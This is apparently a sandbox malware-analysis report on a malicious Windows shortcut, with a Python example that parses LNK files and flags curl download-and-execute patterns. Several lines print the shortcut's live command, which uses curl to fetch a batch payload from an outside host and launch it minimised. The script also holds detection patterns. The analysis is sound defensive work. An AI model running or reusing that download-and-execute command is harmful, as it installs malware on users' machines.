Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/uploads/2024/09/GoogleSans-Medium.ttf
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/uploads/2024/09/GoogleSans-Regular.ttf
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-includes/js/hoverIntent.min.js?ver=1.10.2
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-json/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/xmlrpc.php
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/xmlrpc.php?rsd
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://use.fontawesome.com/releases/v5.15.4/css/all.css?ver=2.0.3
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://www.dmca.com/Protection/Status.aspx?id=502286c4-db26-4ff5-898e-3899d9fd8507&amp;refurl=https
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://www.google.com/maps/embed?pb=
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://www.google.com/recaptcha/api.js?render=6LdvsEcqAAAAACGxQQMlRM5ahTlqMCdLjESH279L&amp;ver=3.0
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-4HCELHBG2B
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=GT-M3LB298
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-185801756-1
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-THFFBK43
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://www.youtube.com/channel/UCUZToD8MAs4MWywND_9DStg
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://www.youtube.com/channel/UCjt7SG-LPi6OafmLxoc1ULg
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://yoast.com/wordpress/plugins/seo/
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703

System Summary

Source: document.lnk.download.lnk LNK file: /c curl -s -o C:\Users\Public\UDkXtQleTB.bat https://tvdseo.com/file/quan.bat & start /min C:\Users\Public\UDkXtQleTB.bat
Source: classification engine Classification label: mal72.winLNK@7/1@1/2
Source: C:\Windows\SysWOW64\curl.exe File created: C:\Users\Public\UDkXtQleTB.bat
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7156:120:WilError_03
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c curl -s -o C:\Users\Public\UDkXtQleTB.bat https://tvdseo.com/file/quan.bat & start /min C:\Users\Public\UDkXtQleTB.bat
Source: C:\Windows\System32\conhost.exe File read: C:\Users\desktop.ini
Source: C:\Windows\SysWOW64\curl.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o C:\Users\Public\UDkXtQleTB.bat https://tvdseo.com/file/quan.bat
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UDkXtQleTB.bat
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\curl.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: document.lnk.download.lnk LNK file: ..\..\..\Windows\SysWOW64\cmd.exe
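The two LNK fields reported above, the relative path to cmd.exe and the argument string that downloads quan.bat and starts it, are what a triage tool should pull out of a shortcut before detonation. The Python below is an added example and is not part of this Joe Sandbox report or its tooling: it parses the ShellLink StringData fields as laid out in MS-SHLLINK (skipping the LinkTargetIDList and LinkInfo blocks), then applies the same curl download-and-execute heuristic that the Sigma rule named in the report describes to the extracted arguments. The sample shortcut is constructed in memory from the path and argument values shown in this report; the interpreter list, the writable-directory pattern, and the builder itself are assumptions made for the example. It reads StringData only, so a real triage script would also pull the LinkInfo local base path.

```python
import re
import struct

# Added example: minimal ShellLink (.lnk) parser plus a curl download-and-execute
# heuristic. Field layout follows MS-SHLLINK; only the parts needed here are modelled.

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_IDLIST, HAS_LINKINFO, IS_UNICODE = 0x01, 0x02, 0x80
# StringData fields in the order MS-SHLLINK stores them, with their LinkFlags bit.
STRING_FIELDS = [(0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon_location")]
# Assumed list of shortcut targets worth flagging (not taken from the report).
INTERPRETERS = {"cmd.exe", "powershell.exe", "mshta.exe", "wscript.exe", "cscript.exe", "rundll32.exe"}
CURL_OUT_RE = re.compile(r'\bcurl(?:\.exe)?\b[^&|]*?\s(?:-o|--output)\s+(?P<out>"[^"]+"|\S+)', re.I)
URL_RE = re.compile(r"https?://\S+", re.I)
STAGE_RE = re.compile(r"\s*(?:&&|\|\||&|\|)\s*")          # cmd.exe command separators
WRITABLE_DIR_RE = re.compile(r"\\Users\\Public\\|\\Temp\\|%TEMP%|\\AppData\\", re.I)


def build_lnk(relative_path, arguments=None, unicode=True):
    """Constructed test input: a ShellLink header, a dummy IDList and StringData."""
    flags = HAS_IDLIST | (IS_UNICODE if unicode else 0)
    fields = {"relative_path": relative_path}
    if arguments is not None:
        fields["arguments"] = arguments
    body = b""
    for bit, name in STRING_FIELDS:
        if name in fields:
            flags |= bit
            body += struct.pack("<H", len(fields[name]))
            body += fields[name].encode("utf-16-le" if unicode else "cp1252")
    # HeaderSize, CLSID, LinkFlags, FileAttributes, 3 timestamps, FileSize,
    # IconIndex, ShowCommand (SW_SHOWNORMAL), HotKey, Reserved1..3 = 76 bytes.
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    idlist = b"\x04\x00AB" + b"\x00\x00"                  # one dummy ItemID plus TerminalID
    return header + struct.pack("<H", len(idlist)) + idlist + body


def parse_lnk(data):
    """Returns the StringData fields of a ShellLink as a dict keyed by field name."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a ShellLink file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76
    if flags & HAS_IDLIST:                                 # skip LinkTargetIDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:                               # LinkInfoSize covers the whole block
        pos += struct.unpack_from("<I", data, pos)[0]
    out = {}
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]     # character count, no terminator
        pos += 2
        if flags & IS_UNICODE:
            out[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            out[name] = data[pos:pos + count].decode("cp1252", errors="replace")
            pos += count
    return out


def analyze_arguments(arguments):
    """Finds 'curl ... -o <file> <url>' stages whose output file a later stage refers to."""
    stages = STAGE_RE.split(arguments or "")
    downloads = []
    for i, stage in enumerate(stages):
        m = CURL_OUT_RE.search(stage)
        if not m:
            continue
        out = m.group("out").strip('"')
        url = URL_RE.search(stage)
        downloads.append({
            "url": url.group(0) if url else None,
            "output": out,
            "executed_later": any(out.lower() in later.lower() for later in stages[i + 1:]),
            "writable_dir": bool(WRITABLE_DIR_RE.search(out)),
        })
    return downloads


def triage_lnk(data):
    """Combines target and argument checks into one verdict for a shortcut."""
    info = parse_lnk(data)
    target = (info.get("relative_path") or "").rsplit("\\", 1)[-1].lower()
    downloads = analyze_arguments(info.get("arguments"))
    return {
        "target": info.get("relative_path"),
        "target_is_interpreter": target in INTERPRETERS,
        "downloads": downloads,
        "download_and_execute": any(d["executed_later"] for d in downloads),
    }


if __name__ == "__main__":
    # Relative path and argument string as reported for document.lnk.download.lnk.
    sample = build_lnk(
        r"..\..\..\Windows\SysWOW64\cmd.exe",
        r"/c curl -s -o C:\Users\Public\UDkXtQleTB.bat https://tvdseo.com/file/quan.bat"
        r" & start /min C:\Users\Public\UDkXtQleTB.bat",
    )
    print(triage_lnk(sample))
```

Splitting on cmd.exe separators before matching is what makes the "executed later" check meaningful: the download stage and the start stage are evaluated as separate commands, exactly as cmd.exe runs them, so a file written by curl and referenced by any later stage is flagged regardless of whether it is launched with start, call, or by name alone.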

Persistence and Installation Behavior

Source: LNK file Process created: C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: curl.exe, 00000002.00000003.1292734170.0000000003630000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o C:\Users\Public\UDkXtQleTB.bat https://tvdseo.com/file/quan.bat
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UDkXtQleTB.bat
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Legend of the contacted-IP distribution map (No. of IPs): under 25%, 25% to 50%, 50% to 75%, over 75%